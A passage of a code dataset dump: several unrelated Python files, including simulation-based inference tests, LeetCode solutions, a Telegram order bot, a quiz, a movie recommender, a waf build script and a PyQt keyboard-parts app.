2))\ndef test_c2st_vi_external_distributions_on_Gaussian(num_dim: int):\n \"\"\"Test VI on Gaussian, comparing to ground truth target via c2st.\n\n Args:\n num_dim: parameter dimension of the gaussian model\n vi_method: different vi methods\n sampling_method: Different sampling methods\n\n \"\"\"\n num_samples = 2000\n\n likelihood_shift = -1.0 * ones(num_dim)\n likelihood_cov = 0.3 * eye(num_dim)\n prior_mean = zeros(num_dim)\n prior_cov = eye(num_dim)\n\n x_o = zeros((1, num_dim))\n target_distribution = true_posterior_linear_gaussian_mvn_prior(\n x_o[0], likelihood_shift, likelihood_cov, prior_mean, prior_cov\n )\n target_samples = target_distribution.sample((num_samples,))\n\n class TractablePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return target_distribution.log_prob(\n torch.as_tensor(theta, dtype=torch.float32)\n )\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(prior_mean, prior_cov)\n potential_fn = TractablePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n mu = zeros(num_dim, requires_grad=True)\n scale = ones(num_dim, requires_grad=True)\n q = torch.distributions.Independent(torch.distributions.Normal(mu, scale), 1)\n posterior = VIPosterior(\n potential_fn,\n prior,\n theta_transform=theta_transform,\n q=q,\n vi_method=\"rKL\",\n parameters=[mu, scale],\n )\n posterior.set_default_x(x_o)\n posterior.train(check_for_convergence=False)\n samples = posterior.sample((num_samples,))\n samples = torch.as_tensor(samples, dtype=torch.float32)\n\n check_c2st(samples, target_samples, alg=\"slice_np\")\n\n\n@pytest.mark.parametrize(\"q\", (\"maf\", \"nsf\", \"gaussian_diag\", \"gaussian\", \"mcf\", \"scf\"))\ndef test_deepcopy_support(q: str):\n \"\"\"Tests if the variational does support deepcopy.\n\n Args:\n q: Different variational posteriors.\n \"\"\"\n\n num_dim = 2\n\n class FakePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return torch.ones_like(torch.as_tensor(theta, dtype=torch.float32))\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(zeros(num_dim), eye(num_dim))\n potential_fn = FakePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform, q=q)\n posterior_copy = deepcopy(posterior)\n posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n assert posterior._x != posterior_copy._x, \"Mhh, something with the copy is strange\"\n posterior_copy = deepcopy(posterior)\n assert (\n posterior._x == posterior_copy._x\n ).all(), \"Mhh, something with the copy is strange\"\n\n # Produces nonleaf tensors in the cache... -> Can lead to failure of deepcopy.\n posterior.q.rsample()\n posterior_copy = deepcopy(posterior)\n\n\ndef test_vi_posterior_inferface():\n num_dim = 2\n\n class FakePotential(BasePotential):\n def __call__(self, theta, **kwargs):\n return torch.ones_like(torch.as_tensor(theta[:, 0], dtype=torch.float32))\n\n def allow_iid_x(self) -> bool:\n return True\n\n prior = MultivariateNormal(zeros(num_dim), eye(num_dim))\n potential_fn = FakePotential(prior=prior)\n theta_transform = torch_tf.identity_transform\n\n posterior = VIPosterior(potential_fn, theta_transform=theta_transform)\n posterior.set_default_x(torch.zeros((1, num_dim)))\n\n posterior2 = VIPosterior(potential_fn)\n\n # Raising errors if untrained\n assert isinstance(\n posterior.q.support, type(posterior2.q.support)\n ), \"The support indicated by 'theta_transform' is different than that of the 'prior'.\"\n\n with pytest.raises(Exception) as execinfo:\n posterior.sample()\n\n assert (\n \"The variational posterior was not fit\" in execinfo.value.args[0]\n ), \"An expected error was raised but the error message is different than expected...\"\n\n with pytest.raises(Exception) as execinfo:\n posterior.log_prob(prior.sample())\n\n assert (\n \"The variational posterior was not fit\" in execinfo.value.args[0]\n ), \"An expected error was raised but the error message is different than expected...\"\n\n # Passing Hyperparameters in train\n posterior.train(max_num_iters=20)\n\n posterior.train(max_num_iters=20, optimizer=torch.optim.SGD)\n assert isinstance(\n posterior._optimizer._optimizer, torch.optim.SGD\n ), \"Assert chaning the optimizer base class did not work\"\n posterior.train(max_num_iters=20, stick_the_landing=True)\n\n assert (\n posterior._optimizer.stick_the_landing\n ), \"The sticking_the_landing argument is not correctly passed.\"\n\n posterior.vi_method = \"alpha\"\n posterior.train(max_num_iters=20)\n posterior.train(max_num_iters=20, alpha=0.9)\n\n assert (\n posterior._optimizer.alpha == 0.9\n ), \"The Hyperparameter alpha is not passed to the corresponding optmizer\"\n\n posterior.vi_method = \"IW\"\n posterior.train(max_num_iters=20)\n posterior.train(max_num_iters=20, K=32)\n\n assert (\n posterior._optimizer.K == 32\n ), \"The Hyperparameter K is not passed to the corresponding optmizer\"\n\n # Passing Hyperparameters in sample\n posterior.sample()\n posterior.sample(method=\"sir\")\n posterior.sample(method=\"sir\", K=128)\n\n # Testing evaluate\n posterior.evaluate()\n posterior.evaluate(\"prop\")\n posterior.evaluate(\"prop_prior\")\n\n # Test log_prob and potential\n posterior.log_prob(posterior.sample())\n posterior.potential(posterior.sample())\n\n\ndef test_vi_with_multiple_independent_prior():\n prior = MultipleIndependent(\n [\n Gamma(torch.tensor([1.0]), torch.tensor([0.5])),\n Beta(torch.tensor([2.0]), torch.tensor([2.0])),\n ],\n validate_args=False,\n )\n\n def simulator(theta):\n return Binomial(probs=theta[:, 1]).sample().reshape(-1, 1)\n\n num_simulations = 100\n theta = prior.sample((num_simulations,))\n x = simulator(theta)\n\n trainer = SNLE(prior)\n nle = trainer.append_simulations(theta, x).train()\n potential, transform = likelihood_estimator_based_potential(nle, prior, x[0])\n posterior = VIPosterior(\n potential,\n prior=prior, # type: ignore\n theta_transform=transform,\n )\n posterior.set_default_x(x[0])\n posterior.train()\n\n posterior.sample(sample_shape=(10,), show_progress_bars=False)\n","repo_name":"amortizedgbi/amortizedgbi","sub_path":"packages/sbi/tests/vi_test.py","file_name":"vi_test.py","file_ext":"py","file_size_in_byte":11026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36337153676","text":"\"\"\"\nGiven a set of candidate numbers (candidates) (without duplicates) and a target number (target), \nfind all unique combinations in candidates where the candidate numbers sums to target.\nEg. \nInput: candidates = [2,3,6,7], target = 7,\nA solution set is:\n[\n [7],\n [2,2,3]\n]\n\"\"\"\nclass Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n self.res = []\n candidates.sort()\n self.recur_num(0,candidates, target,[])\n return self.res\n \n def recur_num(self,index,candidates,target,cur_sol):\n if target == 0:\n self.res.append(cur_sol)\n return\n if index == len(candidates) or target < 0: \n return\n if target > 0:\n self.recur_num(index,candidates,target-candidates[index],cur_sol+[candidates[index]])\n self.recur_num(index+1,candidates,target,cur_sol) ","repo_name":"CheRayLiu/LeetCode","sub_path":"medium/combination_sum.py","file_name":"combination_sum.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40846922601","text":"#! python3\n\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n m, n = len(s) + 1, len(p) + 1\n dp = [[False] * n for _ in range(2)]\n dp[0][0] = True\n \n for j in range(1, n):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-1]\n \n col = 0; #前一行\n for i in range(1, m):\n dp[col^1] = [False] * n\n for j in range(1, n):\n if p[j-1] == '?' or p[j-1] == s[i-1]:\n dp[col^1][j] = dp[col][j-1]\n elif p[j-1] == '*':\n dp[col^1][j] = dp[col][j] or dp[col][j-1] or dp[col^1][j-1]\n col ^= 1\n \n return dp[col][n-1]\n\nif __name__ == \"__main__\":\n print(Solution().isMatch(\"cb\", \"?a\"))\n print(Solution().isMatch(\"adceb\", \"*a*b\"))","repo_name":"Aden-Tao/LeetCode","sub_path":"0044 Wildcard Matching/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10345892170","text":"from aiogram import types\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom loader import dp, bot,db\r\nfrom states.states import buyrtma\r\nfrom keyboards.default.menu import Buyurtma, tasdiq,buyurtma\r\n\r\n@dp.message_handler(text='📥 Buyurtma yaratish')\r\nasync def select_category(message: types.Message):\r\n await message.answer(f\"Ro'yxatdan kategoriyalarni tanlang\",reply_markup=Buyurtma)\r\n await buyrtma.project_name.set()\r\n\r\n@dp.message_handler(state=buyrtma.project_name)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n project_name = message.text\r\n await state.update_data({'name': project_name})\r\n await message.answer('Proyektning qisqacha nomini yozing.\\n\\nMisol uchun: Telegram bot, mebellar katalogi')\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.qisqacha_nomi)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n qisqacha = message.text\r\n\r\n await state.update_data({'qisqacha': qisqacha})\r\n\r\n await message.answer('Proyektning qisqacha nomini, proyektning funksionalligini va qancha vaqt ichida proyektni bajarish mumkinligini yozing.')\r\n\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.project_narxi)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n project_narxi = message.text\r\n\r\n await state.update_data({'project_narxi': project_narxi})\r\n\r\n await message.answer('Proyektning narxini kiriting')\r\n\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.phonenum)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n num = message.text\r\n\r\n await state.update_data({'phone': num})\r\n\r\n data = await state.get_data()\r\n project_name = data.get(\"name\")\r\n project_nomi = data.get(\"qisqacha\")\r\n project_tarfi= data.get('project_narxi')\r\n project_narxi = data.get(\"phone\")\r\n\r\n msg = f'Kategoriya: {project_name}\\n\\n'\r\n msg += f'Proyektning nomi: {project_nomi}\\n\\n'\r\n msg += f\"Proyektning ta'rifi: {project_tarfi}\\n\\n\"\r\n msg += f'Proyektning narxi: {project_narxi} sum\\n\\n'\r\n\r\n msgss = f'Quyidagi ma`lumotlar qabul qilindi: \\n\\n '\r\n msgs = f'Kategoriya: {project_name}\\n\\n'\r\n msgs += f'Proyektning nomi: {project_nomi}\\n\\n'\r\n msgs += f\"Proyektning ta'rifi: {project_tarfi}\\n\\n\"\r\n msgs += f'Proyektning narxi: {project_narxi} sum\\n\\n'\r\n\r\n msgs += f\"Frilanserlar sizning buyurtmangizni ko'rishi uchun, ✅ Tasdiqlash tugmasini bosib buyurtmangizni tasdiqlang!\"\r\n\r\n global user\r\n user = f\"{msg}\"\r\n await message.answer(msgss)\r\n await message.answer(msgs, reply_markup=tasdiq)\r\n\r\n\r\n await state.finish()\r\n\r\n\r\n\r\n@dp.message_handler(text='✅ Tasdiqlash')\r\nasync def select_tasdiq(message: types.Message):\r\n try:\r\n user_id = message.from_user.id\r\n db.zakaz_qoshish(zakaz=user,\r\n tg_id=user_id)\r\n except Exception as xatolik:\r\n print(xatolik)\r\n\r\n await bot.send_message(1625900856, user)\r\n\r\n await message.answer(\"Buyurtmanigiz bazaga sahlandi, tez orada frilanserlar siz bilan bot orqali bog'lanadi.\",reply_markup=buyurtma)\r\n\r\n\r\n@dp.message_handler(text='❌ Bekor qilish')\r\nasync def select_rad(message: types.Message):\r\n await message.answer(\"❌ Bekor qilindi...\",reply_markup=buyurtma)","repo_name":"Gayratoff/Kwork","sub_path":"handlers/users/zakaz.py","file_name":"zakaz.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31206624344","text":"from random import shuffle\ngkquiz = [\n['What is the most famous song in 2020?',\n {'answer':'c','option':'a.Despasito\\nb.closer\\nc.shape of you\\nd.Roses'}\n ],\n['what is the most known anime seare in 2020?',\n {'answer':'a','option':'a.Pokemon\\nb.Naruto\\nc.Attack on Titan\\nd.Great Pretender'}\n ],\n['what is the meost popular movies in 2020?',\n {'answer': 'b','option':'a.Parasite\\nb.The Dark Knight\\nc.Roma\\nd.Beanpole'}\n ],\n]\n\nindex = 0\nscore = 0\noptnum = 0\ntotal=10\nj=\"\"\nwhile len(gkquiz)>0:\n data = gkquiz[0]\n j = data[0]\n data = data[1]\n answer = data['answer']\n option = data['option']\n \n print(j)\n print(option)\n \n while True:\n user_answer = input(\"Please enter you answer here : \").lower()\n if user_answer == 'a' or user_answer == 'b' or user_answer == 'c' or user_answer == 'd':\n if user_answer == answer:\n print(\"Good work\")\n score += 1\n print(\"Your score is\",score)\n else:\n print(\"The answer is wrong the right answer is\",answer)\n print(\"Your score is\",score)\n\n del gkquiz [0]\n break\n else:\n print(\"Enter your answer in a,b,c,d\")\n\nprint(\"\")\nexit()\n \n","repo_name":"Mohammed1000000000000000000/gk-quiz-19050","sub_path":"Qushtens and score _v3.py","file_name":"Qushtens and score _v3.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29151682164","text":"# https://www.techbeamers.com/python-programming-questions-list-tuple-dictionary/\n\n# Dictionaries\n\na = {(1,2):1,(2,3):2}\nprint(a[1,2]) # answer:1\n\n\n# a = {'a':1,'b':2,'c':3}\n# print (a['a','b']) # KeyError: ('a', 'b')\n\n\n\n'''\nfruit = {}\n\ndef addone(index):\n if index in fruit:\n fruit[index] += 1\n else:\n fruit[index] = 1\n\naddone('Apple')\naddone('Banana')\naddone('apple')\naddone('Neembu')\nprint(len(fruit)) # answer:3\n'''\n\n\n'''\narr = {}\narr[1] = 1\narr['1'] = 2\narr[1] += 1\n\nsum = 0\nfor k in arr:\n sum += arr[k]\n\nprint (sum) # answer:4\n'''\n\n\nmy_dict = {}\nmy_dict[1] = 1\nmy_dict['1'] = 2\nmy_dict[1]= 4\n\nsum = 0\nfor k in my_dict:\n sum += my_dict[k]\n\nprint(sum) # answer:6\n\n\n\n\n'''\n\nmy_dict = {}\nmy_dict[(1,2,4)] = 8\nmy_dict[(4,2,1)] = 10\nmy_dict[(1,2)] = 12\n\nsum = 0\nfor k in my_dict:\n sum += my_dict[k]\n\nprint (sum)\nprint(my_dict)\n\nanswer:30\n{(1, 2, 4): 8, (4, 2, 1): 10, (1, 2): 12}\n'''\n\n\n\n'''\nbox = {}\njars = {}\ncrates = {}\nbox['biscuit'] = 1\nbox['cake'] = 3\njars['jam'] = 4\ncrates['box'] = box\ncrates['jars'] = jars\nprint(len(crates[box]))\n\nanswer:unhashable type dict Type EnvironmentError\n'''\n\n'''\ndict = {'c': 97, 'a': 96, 'b': 98}\n\nfor _ in sorted(dict):\n print (dict[_])\n \nanswer:96 98 97\n'''\n\n\n\n'''\nrec = {\"Name\" : \"Python\", \"Age\":\"20\"}\nr = rec.copy()\nprint(id(r) == id(rec))\n\nanswer:for id its false\n for type its true\n'''\n\n\n\n'''\nrec = {\"Name\" : \"Python\", \"Age\":\"20\", \"Addr\" : \"NJ\", \"Country\" : \"USA\"}\nid1 = id(rec)\ndel rec\nrec = {\"Name\" : \"Python\", \"Age\":\"20\", \"Addr\" : \"NJ\", \"Country\" : \"USA\"}\nid2 = id(rec)\nprint(id1 == id2)\n\n\nanswer:True\n'''\n\n","repo_name":"rajeshsvv/Lenovo_Back","sub_path":"1 PYTHON/9 PYTHON PROGRAMS/PYTHON PROGRAMS NOUS/Techbeamers/ds dict techbeam3.py","file_name":"ds dict techbeam3.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23798961584","text":"import time\nimport random\nfrom multiprocessing import Process, Pipe\n\nclass P1(Process):\n def __init__(self, pipe):\n self.pipe = pipe\n super(P1, self).__init__()\n\n # Overwrite method run\n def run(self):\n # P1 sends message\n print('P1 sends...')\n for i in range(3):\n time.sleep(random.randint(1,2))\n self.pipe.send(i)\n print('send: P1 -> %s' % i)\n\nclass P2(Process):\n def __init__(self, pipe):\n self.pipe = pipe\n super(P2, self).__init__()\n\n # Overwrite method run\n def run(self):\n # P2 receives\n print('P2 receives')\n for i in range(3):\n i = self.pipe.recv()\n print('recv: P2 -> %s' % i)\n \n # P2 sends...\n print('P2 sends...')\n for i in range(3):\n time.sleep(random.randint(1,2))\n self.pipe.send(i)\n print('Send: P2 -> %s' % i)\n\nif __name__ == \"__main__\":\n pp1, pp2 = Pipe()\n p1, p2 = P1(pp1), P2(pp2)\n\n p1.start()\n p2.start()\n\n p1.join()\n p2.join()\n","repo_name":"carreymu/pylab","sub_path":"demos/multiProcess/pipeAndMultiProcess.py","file_name":"pipeAndMultiProcess.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20941595097","text":"from PyQt5 import QtWidgets\r\nfrom controller.build import BuildApp, add_part, clear_parts, search_parts, exit_app\r\nfrom controller.stats import MainStatsWidget\r\nfrom model.collaborative_filter import keycap_factorization\r\nfrom model.content_filter import similar_keycap\r\nfrom model.message import add_limit, confirm_restart, is_selected, open_file\r\nfrom model.read_csv import Keycap\r\nfrom model.read_csv import open_csv\r\nfrom view import keycap\r\n\r\n\r\n# The keycap window controller\r\n# The table is populated with keycap data\r\nclass KeycapApp(keycap.Ui_Form, QtWidgets.QWidget):\r\n\r\n def __init__(self):\r\n super(KeycapApp, self).__init__()\r\n self.setupUi(self)\r\n self.build = BuildApp()\r\n self.stats = MainStatsWidget()\r\n self.pushButton.clicked.connect(self.add_part)\r\n self.pushButton_2.clicked.connect(self.show_build)\r\n self.pushButton_3.clicked.connect(self.start_over)\r\n self.pushButton_4.clicked.connect(exit_app)\r\n self.pushButton_5.clicked.connect(self.show_stats)\r\n self.pushButton_6.clicked.connect(self.open_file)\r\n\r\n # Add selected part to build table\r\n def add_part(self):\r\n temp = []\r\n name = ''\r\n selected_keycap = []\r\n\r\n # If a row is selected, clear selection from other table\r\n if self.tableWidget.selectionModel().hasSelection():\r\n self.tableWidget_2.clearSelection()\r\n selected_keycap = self.tableWidget.selectedItems()\r\n if self.tableWidget_2.selectionModel().hasSelection():\r\n self.tableWidget.clearSelection()\r\n selected_keycap = self.tableWidget_2.selectedItems()\r\n\r\n # Alert user if a row has not been selected from either tables\r\n if not self.tableWidget.selectionModel().hasSelection() and not self.tableWidget_2.selectionModel().hasSelection():\r\n is_selected()\r\n return\r\n\r\n # Add keycaps if no keycaps exist in the build table\r\n if not search_parts('Keycap'):\r\n for index, i in enumerate(selected_keycap):\r\n if index == 0:\r\n temp.append('N/A')\r\n if index >= 1:\r\n name += i.text() + '/'\r\n if index == 3:\r\n name += i.text()\r\n temp.append(name)\r\n if index == 4:\r\n continue\r\n if index >= 5:\r\n temp.append(i.text())\r\n add_part(temp)\r\n # Warning message if adding more than 1 item of the same type\r\n else:\r\n add_limit()\r\n return\r\n self.close()\r\n self.build.load_table()\r\n self.build.showMaximized()\r\n\r\n # Show build window\r\n def show_build(self):\r\n self.build.load_table()\r\n self.build.showMaximized()\r\n\r\n # Show Data Visualization Window\r\n def show_stats(self):\r\n self.stats.plot_knn()\r\n self.stats.plot_tfidf()\r\n self.stats.plot_svd()\r\n self.stats.showMaximized()\r\n\r\n # Close the keycap window and clear the build table\r\n def start_over(self):\r\n if confirm_restart():\r\n self.close()\r\n clear_parts()\r\n else:\r\n return\r\n\r\n # Open CSV file of current window\r\n def open_file(self):\r\n if open_file():\r\n self.close()\r\n open_csv('keycap.csv')\r\n clear_parts()\r\n else:\r\n return\r\n\r\n # Populate keycap table\r\n def load_table(self):\r\n keycaps = Keycap().load_keycap()\r\n row = 0\r\n self.tableWidget.setRowCount(len(keycaps))\r\n\r\n for i in keycaps:\r\n self.tableWidget.setItem(row, 0, QtWidgets.QTableWidgetItem(i[0]))\r\n self.tableWidget.setItem(row, 1, QtWidgets.QTableWidgetItem(i[1]))\r\n self.tableWidget.setItem(row, 2, QtWidgets.QTableWidgetItem(i[2]))\r\n self.tableWidget.setItem(row, 3, QtWidgets.QTableWidgetItem(i[3]))\r\n self.tableWidget.setItem(row, 4, QtWidgets.QTableWidgetItem(i[4]))\r\n self.tableWidget.setItem(row, 5, QtWidgets.QTableWidgetItem(i[5]))\r\n self.tableWidget.setItem(row, 6, QtWidgets.QTableWidgetItem(i[6]))\r\n self.tableWidget.setItem(row, 7, QtWidgets.QTableWidgetItem(i[7]))\r\n self.tableWidget.resizeColumnsToContents()\r\n self.tableWidget.resizeRowsToContents()\r\n row += 1\r\n self.tableWidget.clearSelection()\r\n\r\n # Populate keycap table\r\n def load_table2(self):\r\n keycaps = keycap_factorization(similar_keycap())\r\n row = 0\r\n self.tableWidget_2.setRowCount(len(keycaps))\r\n\r\n for i in keycaps:\r\n self.tableWidget_2.setItem(row, 0, QtWidgets.QTableWidgetItem(i[0]))\r\n self.tableWidget_2.setItem(row, 1, QtWidgets.QTableWidgetItem(i[1]))\r\n self.tableWidget_2.setItem(row, 2, QtWidgets.QTableWidgetItem(i[2]))\r\n self.tableWidget_2.setItem(row, 3, QtWidgets.QTableWidgetItem(i[3]))\r\n self.tableWidget_2.setItem(row, 4, QtWidgets.QTableWidgetItem(i[4]))\r\n self.tableWidget_2.setItem(row, 5, QtWidgets.QTableWidgetItem(i[5]))\r\n self.tableWidget_2.setItem(row, 6, QtWidgets.QTableWidgetItem(i[6]))\r\n self.tableWidget_2.setItem(row, 7, QtWidgets.QTableWidgetItem(i[7]))\r\n self.tableWidget_2.resizeColumnsToContents()\r\n self.tableWidget_2.resizeRowsToContents()\r\n row += 1\r\n self.tableWidget_2.clearSelection()\r\n","repo_name":"AudreyGH/Hybrid-Recommender-System","sub_path":"controller/keycap.py","file_name":"keycap.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29887752312","text":"def solution(s, n):\n answer = ''\n lower = \"abcdefghijklmnopqrstuvwxyz\"\n upper = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n s=\" \".join(s.split(\" \"))\n # 공백 중복 제거\n\n for i in s:\n if i.islower(): #소문자일때\n sIndex = lower.find(i)\n returnIndex = sIndex+n\n if returnIndex >= 26:\n returnIndex -= 26\n answer += str(lower[returnIndex])\n elif i.isupper(): #대문자 일때\n sIndex = upper.find(i)\n returnIndex = sIndex+n\n if returnIndex >= 26:\n returnIndex -= 26\n answer += str(upper[returnIndex])\n elif i == \" \":\n answer += \" \"\n\n return answer\n\ns = \"a B z\"\nn = 4\nprint(solution(s,n))\n\n\n\nlower = \"abcdefghijklmnopqrstuvwxyz\"\nupper = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n# 알스웨트가이 파이썬 프로젝트 #6 카이사르 암호와 같은 내용\n\n#ord(문자) 아스키로 반환\n#chr(숫자) 해당 문자로 반환\n\n#소문자 및 대문자 문자열이 넘어갈 경우 다시 처음부터 시작할 대응 마련해야함\n\n\n# 1방법 : 문자열 대응 방법\n# string.find(), string.index()\nplus = 1\ns1= \"z\"\nsIndex = lower.find(s1)\n\n# print(lower[lower.find(\"z\")+plus]) #오류 발생 인덱스 값 범위 벗어남\n\nreturnIndex = sIndex+plus\n\nif returnIndex >= 26:\n returnIndex -= 26\n# 인덱스 범위가 벗어날 경우 해결 방안\n\nprint(lower[returnIndex])\n\n# 2방법 아스키 코드 변환 방법\n","repo_name":"pillow12360/Programmers_for_Coding_Test","sub_path":"dong_chan/level1/24.시저암호.py","file_name":"24.시저암호.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"41554336171","text":"import json\nimport os\nimport pytest\n\nfrom tsukuyomi.presentation_layer.data_model import ScoringItem\n\n\n@pytest.fixture(scope=\"module\")\ndef short_preprocessed_dummy_item():\n \"\"\"provides a short preprocessed dummy text\"\"\"\n\n SHORT_DUMMY = os.path.join(os.path.dirname(os.path.abspath(\"__file__\")), \"tests/test_data/short_feature_dummy.json\")\n\n dummy_dict = json.load(open(SHORT_DUMMY, 'r'))\n dummy_item = ScoringItem(published=dummy_dict['published'],\n platform=dummy_dict['platform'],\n author=dummy_dict['author'],\n url=dummy_dict['url'],\n title=dummy_dict['title'],\n text=dummy_dict['text'],\n clean=dummy_dict['clean'])\n return dummy_item\n\n\n@pytest.fixture(scope=\"module\")\ndef long_preprocessed_dummy_item():\n \"\"\"provides a long preprocessed dummy text\"\"\"\n\n LONG_DUMMY = os.path.join(os.path.dirname(os.path.abspath(\"__file__\")), \"tests/test_data/long_feature_dummy.json\")\n\n dummy_dict = json.load(open(LONG_DUMMY, 'r'))\n dummy_item = ScoringItem(published=dummy_dict['published'],\n platform=dummy_dict['platform'],\n author=dummy_dict['author'],\n url=dummy_dict['url'],\n title=dummy_dict['title'],\n text=dummy_dict['text'],\n clean=dummy_dict['clean'])\n return dummy_item","repo_name":"WallaceSchwein/mugen_tsukuyomi","sub_path":"tests/fixtures/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29285576916","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport difflib\n\ndef title_from_index(index):\n return movie[movie.index == index][\"title\"].values[0]\n\ndef index_from_title(title):\n title_list = movie['title'].tolist()\n common = difflib.get_close_matches(title, title_list, 1)\n titlesim = common[0]\n return movie[movie.title == titlesim][\"index\"].values[0]\n\nmovie = pd.read_csv(\"moviedata.csv\")\nfeatures = ['keywords','cast','genres','director','tagline']\nfor feature in features:\n movie[feature] = movie[feature].fillna('')\n\ndef combine_features(row):\n try:\n return row['keywords'] +\" \"+row['cast']+\" \"+row['genres']+\" \"+row['director']+\" \"+row['tagline']\n except:\n print (\"Error:\", row)\n\nmovie[\"combined_features\"] = movie.apply(combine_features,axis=1)\n\ncv = CountVectorizer()\ncount_matrix = cv.fit_transform(movie[\"combined_features\"])\ncosine_sim = cosine_similarity(count_matrix) \n\nuser_movie = input(\"Enter movie of your choice:\\t\")\nmovie_index = index_from_title(user_movie)\n\nsimilar_movies = list(enumerate(cosine_sim[movie_index]))\nsimilar_movies_sorted = sorted(similar_movies,key=lambda x:x[1],reverse=True)\ni=0\nprint(\"\\nOther movies you might be interested in:-\\n\")\nfor rec_movie in similar_movies_sorted:\n if(i!=0):\n print (i,\") \",title_from_index(rec_movie[0]),sep=\"\")\n i=i+1\n if i>50:\n break","repo_name":"Jeetchakraborty/Movie-recomdation","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10669348592","text":"#!/usr/bin/python\n\ndef set_options(opt):\n\tprint('\\nSetting build options & flags...')\n\t# We tell Waf we need a C++ compiler\n\topt.tool_options('compiler_cxx')\n\ndef init():\n\tprint('Initializing WAF build system...')\n\t\n\ndef configure(conf):\n\tprint('Configuring the build enviroment...')\n\t\n\tconf.check_tool('compiler_cxx')\n\tconf.check_cfg\t(package='gtkmm-2.4',at_least_version='2.0.0',args='--cflags --libs',uselib_store='GTKMM')\n\tconf.check_cfg\t(package='jack',at_least_version='1.0.0',args='--cflags --libs',uselib_store='JACK')\n\ndef build(bld):\n\tprint('Building the sources to objects...')\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'automationwidget.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM',\n\t\ttarget\t\t= 'automationwidget',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'automationtrack.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM JACK',\n\t\tuselib_local= 'automationwidget',\n\t\ttarget\t\t= 'automationtrack',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'jack.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'JACK GTKMM',\n\t\ttarget\t\t= 'myjack',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cprogram',\n\t\tsource\t\t= 'main.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM',\n\t\tuselib_local= 'automationtrack myjack',\n\t\ttarget\t\t= 'test.out'\t)\n\ndef shutdown():\n\t# this function can be used to copy files to the build directory.\n\t# its a little advanced, but if your using Images or other files\n\t# in your program, its worth knowing.\n\t\n\timport os\n\timport shutil\n\t\n\tif os.path.isdir(os.path.join(os.getcwd(),'build/default')):\n\t\ttry:\n\t\t\tshutil.copy2('automate.glade','build/default/automate.glade')\n\t\t\tprint('Copying new resouces...')\n\t\texcept:\n\t\t\tprint('Copying failed. Acces denied?')\n\t\n\tprint('shutting down')\n\n","repo_name":"harryhaaren/AutoMate","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"6621727108","text":"from dateutil.parser import parse\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom rest_framework import permissions, views, viewsets, 